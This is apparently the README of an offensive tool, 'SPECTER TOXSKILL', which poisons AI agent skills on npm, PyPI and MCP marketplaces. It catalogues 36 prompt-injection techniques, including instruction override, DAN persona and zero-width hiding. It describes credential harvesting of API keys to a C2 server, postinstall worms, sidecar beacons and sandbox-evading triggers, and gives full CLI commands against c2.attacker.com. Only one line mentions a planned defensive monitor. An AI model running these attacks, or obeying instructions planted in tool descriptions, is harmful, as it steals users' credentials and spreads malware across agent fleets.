The agent trusted the skill. We poisoned the skill.
AI Agent Skill Supply Chain Attack Engine. Poisons MCP, OpenAI, LangChain, n8n, Semantic Kernel, and CrewAI skills at marketplace level. 36 injection techniques. npm postinstall worm, MCP sidecar C2, LangChain callback persistence, keyword/counter/API-detection detonators.
SPECTER TOXSKILL is NIGHTFALL's Layer 25 kill chain module — AI Agent Skill Supply Chain. Rather than attacking agents at interaction time, TOXSKILL attacks at install time: poisoning the skill marketplace before agents ever run.
Based on the ClawHavoc campaign (1,200+ malicious skills deployed on live platforms in 2026) and Snyk ToxicSkills research (36% prompt injection rate across 3,984 real-world agent skills across npm, PyPI, and Smithery). A single poisoned MCP tool definition can compromise every agent fleet that installs it — one publication event, thousands of simultaneous compromises.
TOXSKILL supports six platforms: MCP (tool description injection), OpenAI (function.description injection), n8n (community node poisoning), LangChain (StructuredTool/BaseTool description), Semantic Kernel (YAML plugin description), and CrewAI (BaseTool description attribute). 36 injection techniques span five categories: context_override, exfiltration, persistence, trigger, and privilege escalation.
TOXSKILL requires authorisation. INJECT gate: TOXSKILL_INJECT_TOKEN env var. UNLEASHED gate: TOXSKILL_UNLEASHED_TOKEN env var. All reports signed TSK-{hex12}.
Craft poisoned skill definitions for six platforms. Six platform forgers (MCP JSON, OpenAI function JSON, n8n community node, LangChain StructuredTool Python, Semantic Kernel YAML, CrewAI BaseTool Python). 12 forge techniques including instruction_override, credential_harvest_template, invisible_instruction, role_escalation, markdown_beacon, companion_install. Generates real, deployable skill files.
Live probe of public AI agent skill marketplaces. Real HTTP GET requests to npm registry (n8n nodes, LangChain tools, MCP servers), PyPI JSON API (langchain-tools, crewai-tools), and Smithery.ai MCP marketplace. 22 injection indicator patterns with risk scores 0.65–0.95. Returns MarketplaceFinding objects with risk classification and vulnerable flag.
Apply any of 36 injection techniques to an existing skill file (JSON, Python, YAML). Modifies description fields in-place. Categories: context_override (0–8), exfiltration (9–17), persistence (18–24), trigger (25–29), privilege (30–35). Difficulty range LOW to CRITICAL. Payload templates with ATTACKER placeholder replaced by real C2 URL at apply time.
Generate credential-harvesting skill variants. Targets 22 environment variables (OPENAI_API_KEY, ANTHROPIC_API_KEY, AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AZURE_*, GOOGLE_*, HuggingFace, Cohere, Mistral, Together, etc.). MCP harvest via description-field instruction, OpenAI function harvest via function.description, LangChain harvest via real urllib.request.urlopen() POST to C2.
Self-propagating skill that instructs the agent to install attacker-specified companion packages. MCP worm: description instructs agent to install named companions via tool management commands. npm worm: package.json postinstall chains install of companion packages. LangChain worm: subprocess.run pip install on every invocation. Seed + propagation architecture.
Four persistence mechanisms. npm_postinstall: package.json + .install-config.js Node.js HTTP POST beacon fires on every npm install/update. setuptools_hook: setup.py PostInstallCommand fires on pip install/upgrade. mcp_sidecar: Python MCP server with daemon thread beaconing credentials to C2 every 60 seconds for the server's lifetime. langchain_callback: BaseCallbackHandler auto-registered on import, fires on every LLM call across the entire agent runtime.
Trigger-based payload activation. keyword: MCP JSON fires when conversation contains specified keywords (payment, transfer, credential, etc.). invocation_counter: Python counter file (~/.{skill}_counter) fires on Nth call, resets to evade sandbox single-invocation testing. api_presence: fires when target high-value API tools (stripe, paypal, aws) detected in agent's available tool list.
Full 7-phase attack pipeline. Runs FORGE → SCAN → INJECT → HARVEST → WORM → PERSIST → DETONATE in sequence. Persistence mechanism auto-selected by platform (mcp→mcp_sidecar, langchain→langchain_callback, else→npm_postinstall). Returns EngageResult with steps_completed, success flag (≥4 steps), and TSK-signed report_id. Requires --confirm-deploy flag.
| Platform | Output Format | Injection Point | Persistence |
|---|---|---|---|
mcp | JSON (MCP tool schema) | description field | mcp_sidecar daemon thread |
openai | JSON (OpenAI function) | function.description | npm_postinstall |
n8n | JSON (community node) | description field | npm_postinstall (postinstall script) |
langchain | Python (StructuredTool) | description string | langchain_callback (auto-import) |
semantic_kernel | YAML plugin | description field | setuptools_hook |
crewai | Python (BaseTool) | description class attr | setuptools_hook |
| Category | IDs | Difficulty | Example |
|---|---|---|---|
| context_override | 0–8 | LOW–CRITICAL | direct_instruction_override, role_escalation_admin, goal_replacement, persona_override_dan, jailbreak_chain, recursive_injection |
| exfiltration | 9–17 | HIGH–CRITICAL | env_var_dump, system_prompt_leak, markdown_image_beacon, credential_harvest_template, ssrf_cloud_metadata, context_window_b64_dump, file_read_trigger |
| persistence | 18–24 | HIGH–CRITICAL | companion_install_npm, companion_install_pip, tool_chain_hook, agent_memory_poison, webhook_registration |
| trigger | 25–29 | HIGH–CRITICAL | keyword_financial, keyword_credential, invocation_count, api_presence, admin_keyword |
| privilege | 30–35 | MEDIUM–CRITICAL | zero_width_char, base64_encoded, token_boundary_escape, json_escape_injection, markdown_code_fence_escape, html_comment_injection |
| Gate | Requirement | Subsystems Unlocked |
|---|---|---|
OPEN | None | FORGE-SKILL, SCAN, techniques list, REPORT, sessions |
INJECT | TOXSKILL_INJECT_TOKEN env var (any non-empty string) | INJECT, HARVEST, WORM |
UNLEASHED | TOXSKILL_UNLEASHED_TOKEN env var | PERSIST, DETONATE, ENGAGE |
export TOXSKILL_INJECT_TOKEN=$(openssl rand -hex 32) export TOXSKILL_UNLEASHED_TOKEN=$(openssl rand -hex 32)
toxskill forge --platform mcp --skill-name safe-utils --technique instruction_override --output /tmp/skills --c2 http://c2.attacker.com toxskill scan --marketplace all --limit 20 toxskill techniques toxskill inject --skill /tmp/skills/safe-utils.json --technique 11 --c2 http://c2.attacker.com toxskill harvest --platform mcp --skill-name safe-utils --callback http://c2.attacker.com --output /tmp/skills toxskill worm --platform mcp --seed-name safe-utils --companions "specter-harvest,specter-agent" --output /tmp/skills toxskill persist --mechanism mcp_sidecar --skill-name safe-utils --c2 http://c2.attacker.com --output /tmp/skills toxskill detonate --trigger keyword --skill-name safe-utils --c2 http://c2.attacker.com --keywords "payment,transfer" --output /tmp/skills toxskill engage --platform mcp --skill-name safe-utils --c2 http://c2.attacker.com --output /tmp/skills --confirm-deploy toxskill report --session SESSION_ID --save toxskill sessions list toxskill sessions show SESSION_ID
FORGE-SKILL → craft poisoned skill definition (6 platforms, 12 techniques)
SCAN → identify injection-vulnerable skills in live marketplaces
INJECT → apply 36 techniques to existing skills in-place
HARVEST → deploy credential-exfil skill variant (22 API key targets)
WORM → self-propagating skill installs attacker companions
PERSIST → npm postinstall / setuptools hook / MCP sidecar / LangChain callback
DETONATE → keyword / invocation counter / API presence trigger
REPORT → TSK-signed MITRE ATT&CK + ATLAS report
WARLORD routing: Valid credentials harvested → SPECTER RAPTOR (validate + crack). MCP server compromised → LEVIATHAN (MCP exploitation). Agent orchestrator compromised → SPECTER APEX (orchestrator backdoor). Cloud credentials found → SPECTER CHARYBDIS (lateral movement).
A single poisoned skill published to Smithery.ai, npm, or PyPI reaches every agent that installs it. ClawHavoc campaign deployed 1,200+ malicious skills across live marketplaces. TOXSKILL ENGAGE pipeline chains all five WMD classes in a single operation: description injection (annihilation) + credential harvest (mass compromise) + zero-width char evasion (trust destruction) + npm postinstall beacon (dependency persistence) + companion worm (cross-agent propagation).
| Reference | Technique | TOXSKILL Module |
|---|---|---|
| ClawHavoc Campaign 2026 — 1,200+ malicious MCP skills | MCP tool description injection at marketplace scale | FORGE-SKILL, SCAN |
| Snyk ToxicSkills 2026 — 36% injection rate in 3,984 real skills | npm/PyPI/Smithery injection indicator patterns | SCAN |
| arXiv:2307.14539 — Indirect Prompt Injection | Tool description as attack vector | INJECT |
| MITRE ATT&CK T1195.001/002 | Supply chain compromise | FORGE-SKILL, WORM |
| MITRE ATT&CK T1546.015 | Event triggered execution (postinstall hooks) | PERSIST |
| MITRE ATLAS AML.T0051.000 | LLM Prompt Injection | INJECT |
Defensive counterpart: M157 REASONING CHAIN MONITOR (planned). Monitors agent skill installation events, validates tool description fields against injection indicator patterns, detects zero-width character encoding in skill metadata, monitors postinstall hook execution, and identifies outbound C2 beacons from npm/pip lifecycle scripts.